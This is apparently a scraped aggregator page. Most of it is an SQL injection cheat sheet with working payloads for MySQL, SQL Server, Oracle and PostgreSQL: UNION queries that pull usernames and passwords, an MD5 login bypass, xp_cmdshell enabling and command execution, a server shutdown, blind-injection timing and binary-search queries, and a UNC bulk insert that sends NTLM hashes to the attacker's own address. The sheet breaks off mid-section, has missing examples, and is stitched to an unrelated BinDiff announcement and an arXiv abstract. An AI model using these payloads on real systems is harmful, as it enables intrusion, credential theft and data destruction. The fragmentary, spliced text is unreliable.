What is an SQL Injection Cheat Sheet?
An SQL injection cheat sheet is a resource in which you can find detailed technical information about the many different variants of the SQL Injection vulnerability. This cheat sheet is of good reference to both seasoned penetration tester and also those who are just getting started in web application security. About the SQL Injection Cheat SheetThis SQL injection cheat sheet was originally published in 2007 by Ferruh Mavituna on his blog. We have updated it and moved it over from our CEO's blog. Currently this SQL Cheat Sheet only contains information for MySQL, Microsoft SQL Server, and some limited information forORACLE and PostgreSQL SQL servers. Some of the samples in this sheet might not work in every situation because real live environments may vary depending on the usage of parenthesis, different code bases and unexpected, strange and complex SQL sentences. Samples are provided to allow you to get basic idea of a potential attack and almost every section includes a brief information about itself. M :MySQL S :SQL Server P :PostgreSQL O :Oracle + :Possibly all other databases Examples;
Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax.
Language / Database Stacked Query Support Tablegreen: supported, dark gray: not supported, light gray: unknown About MySQL and PHP; To clarify some issues; PHP - MySQL doesn't support stacked queries, Java doesn't support stacked queries (I'm sure for ORACLE, not quite sure about other databases). Normally MySQL supports stacked queries but because of database layer in most of the configurations it’s not possible to execute a second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify? Stacked SQL Injection Attack Samples
If StatementsGet response based on a if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly andaccurately. MySQL If Statement
This will throw an divide by zero error if current logged user is not "sa" or "dbo". Using IntegersVery useful for bypassing, magic_quotes() and similar filters, or even WAFs.
String Concatenation
If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. A better way to do it is using CONCAT()function in MySQL.
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members This will combine results from both news table and members table and return all of them. Another Example: ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1-- UNION – Fixing Language IssuesWhile exploiting Union injections sometimes you get errors because of different language settings (table settings, field settings, combined table / db settings etc.) these functions are quite useful to fix this problem. It's rare but if you dealing with Japanese, Russian, Turkish etc. applications then you will see it.
Bypassing second MD5 hash check login screensIf application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database. Bypassing MD5 Hash Check Example (MSP)Username : admin Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234) Error Based - Find Columns NamesFinding Column Names with HAVING BY - Error Based (S)In the same order,
Simple Insert (MSO+)'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/* Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes@@version (MS) Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also, you can use insert, update statements or in functions. INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10) Bulk Insert (S)Insert a file content to a table. If you don't know internal path of web application you can read IIS (IIS 6 only) metabase file(%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path.
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar VBS, WSH in SQL Server (S)You can use VBS, WSH scripting in SQL Server because of ActiveX support. declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' -- Executing system commands, xp_cmdshell (S)Well known trick, By default it's disabled in SQL Server 2005. You need to have admin access. EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:' Simple ping check (configure your firewall or sniffer to identify request before launch it), EXEC master.dbo.xp_cmdshell 'ping ' You can not read results directly from error or union or something else. Some Special Tables in SQL Server (S)
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0 HOST_NAME() IS_MEMBER (Transact-SQL) IS_SRVROLEMEMBER (Transact-SQL) OPENDATASOURCE (Transact-SQL) INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx You can not use sub selects in SQL Server Insert queries. SQL Injection in LIMIT (M) or ORDER (MSO)SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ; If injection is in second limit you can comment it out or use in your union injection Shutdown SQL Server (S)When you're really pissed off, ';shutdown -- Enabling xp_cmdshell in SQL Server 2005By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these. EXEC sp_configure 'show advanced options',1 RECONFIGURE EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE Finding Database Structure in SQL Server (S)Getting User defined TablesSELECT name FROM sysobjects WHERE xtype = 'U' Getting Column NamesSELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames') Moving records (S)
Fast way to extract data from Error Based SQL Injections in SQL Server (S)';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;-- Detailed Article: Fast way to extract data from Error Based SQL Injections Finding Database Structure in MySQL (M)Getting User defined TablesSELECT table_name FROM information_schema.tables WHERE table_schema = 'tablename' Getting Column NamesSELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tablename' Finding Database Structure in Oracle (O)Getting User defined TablesSELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME' Getting Column NamesSELECT * FROM all_col_comments WHERE TABLE_NAME = 'TABLE' Blind SQL InjectionsAbout Blind SQL InjectionsIn a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections. Normal Blind, You can not see a response in the page, but you can still determine result of a query from response or HTTP status code Totally Blind, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common, though. In normal blinds you can use if statements or abuse WHERE query in injection (generally easier), in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() and sleep(10) in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in ORACLE. Real and a bit Complex Blind SQL Injection Attack SampleThis output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names. This requests done for first char of the first table name. SQL queries a bit more complex then requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm. TRUE and FALSE flags mark queries returned true or false. TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78-- FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103-- TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89-- TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83-- TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80-- FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) Since both of the last 2 queries failed we clearly know table name's first char's ascii value is 80 which means first char is `P`. This is the way to exploit Blind SQL injections by binary search algorithm. Other well-known way is reading data bit by bit. Both can be effective in different conditions. Making Databases Wait / Sleep For Blind SQL Injection AttacksFirst of all use this if it's really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout. WAIT FOR DELAY 'time' (S)This is just like sleep, wait for specified time. CPU safe way to make database wait. WAITFOR DELAY '0:0:10'-- Also, you can use fractions like this, WAITFOR DELAY '0:0:0.51' Real World Samples
BENCHMARK(howmanytimes, do this) Real World Samples
Clear SQL Injection TestsThese tests are simply good for blind sql injection and silent attacks.
Name : ' + (SELECT TOP 1 password FROM users ) + ' Email : [email protected] If application is using name field in an unsafe stored procedure or function, process etc. then it will insert first users password as your name etc. Forcing SQL Server to get NTLM HashesThis attack can help you to get SQL Server user's Windows password of target server, but possibly you inbound connection will be firewalled. Can be very useful internal penetration tests. We force SQL Server to connect our Windows UNC Share and capture data NTLM session with a tool like Cain & Abel. Bulk insert from a UNC Share (S) bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'Check out Bulk Insert Reference to understand how can you use bulk insert. Out of Band Channel AttacksSQL Server
March 18, 2016
Posted by Christian Blichmann, Software Engineer BinDiff is a comparison tool for binary files that helps to quickly find differences and similarities in disassembled code. It is used by security researchers and engineers across the globe to identify and isolate fixes for vulnerabilities in vendor-supplied patches and to analyze multiple versions of the same binary. Another common use case is to transfer analysis results from one binary to another, helping to prevent duplicate analyses of, for example, malware binaries. This also helps to retain knowledge across teams of binary analysts where the individual workflows might vary from analyst to analyst. More specifically, BinDiff can be used to: Compare binary files for x86, MIPS, ARM/AArch64, PowerPC, and other architectures. Identify identical and similar functions in different binaries. Port function names, comments and local variable names from one disassembly to another. Detect and highlight changes between two variants of the same function. Here is a screenshot demonstrating what using BinDiff to display per-function differences looks like: At Google, the BinDiff core engine powers a large-scale malware processing pipeline helping to protect both internal and external users. BinDiff provides the underlying comparison results needed to cluster the world's malware into related families with billions of comparisons performed so far. Ever since zynamics joined Google in 2011, we have been committed to keeping our most valuable tools available to the security research community. We first lowered the price, and today we are taking the next logical step by making it available free of charge. You can download BinDiff from the zynamics web site. It’s the current version, BinDiff 4.2 for both Linux and Windows. To use it, you also need the commercial Hex-Rays IDA Pro disassembler, 6.8 or later. Happy BinDiff-ing! http://www.zynamics.com/software.html Analyzing HTTPS Encrypted Traffic to Identify User Operating System, Browser and Application3/25/2016 Computer Science > Cryptography and SecurityAnalyzing HTTPS Encrypted Traffic to Identify User Operating System, Browser and ApplicationJonathan Muehlstein, Yehonatan Zion, Maor Bahumi, Itay Kirshenboim, Ran Dubin, Amit Dvir, Ofir Pele
(Submitted on 15 Mar 2016 (v1), last revised 23 Mar 2016 (this version, v2)) Desktops and laptops can be maliciously exploited to violate privacy. There are two main types of attack scenarios: active and passive. In this paper, we consider the passive scenario where the adversary does not interact actively with this he device, but he is able to eavesdrop on the network traffic of the device from the network side. Most of the internet traffic is encrypted and thus passive attacks are challenging. In this paper, we show that an external attacker can identify the operation system, browser and application of HTTP encrypted traffic (HTTPS). To the best of our knowledge, this is the first work that shows this. We provide a large data set of more than 20000 examples for this task. Additionally, we suggest new features for this task .We run a through a set of experiments, which shows that our classification accuracy is 96.06%. Comments:1) we have problems with the dataset link and many users ask for this link 2) we need to recalc one of the small confusion matrix 3) the big matrix is after the bib, we want to change place Subjects:Cryptography and Security (cs.CR) Cite as:arXiv:1603.04865 [cs.CR] (or arXiv:1603.04865v2 [cs.CR] for this version)Submission historyFrom: Amit Dvir Dr. [view email] [v1] Tue, 15 Mar 2016 20:00:54 GMT (123kb) [v2] Wed, 23 Mar 2016 07:00:32 GMT (0kb,I) Which authors of this paper are endorsers? | Disable MathJax (What is MathJax?) |
Author: <see article>
These links serve as tributes to those who have written them. Please find contributor details in the links provided Archives
April 2024
Categories |